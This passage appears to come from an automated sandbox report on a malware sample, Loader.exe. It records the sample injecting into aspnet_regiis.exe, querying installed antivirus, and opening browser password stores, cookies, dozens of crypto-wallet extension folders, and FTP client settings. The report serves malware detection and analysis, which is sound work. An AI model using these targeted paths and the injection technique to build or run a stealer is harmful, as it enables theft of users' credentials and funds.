              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3236000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3239000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3249000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F42008Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DEB73 cpuid 5_2_6D7DEB73
              Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\Users\user\Desktop\Loader.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DEF1A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_6D7DEF1A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: aspnet_regiis.exe, 00000008.00000003.1411278198.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1393845431.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1393675845.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1425355733.0000000005956000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7388, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: aspnet_regiis.exeString found in binary or memory: ets/Electrum-LTC
              Source: aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: aspnet_regiis.exe, 00000008.00000003.1423102544.000000000361E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: aspnet_regiis.exe, 00000008.00000003.1351112445.00000000036AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3l
              Source: aspnet_regiis.exe, 00000008.00000003.1329981970.000000000363C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance_
              Source: aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
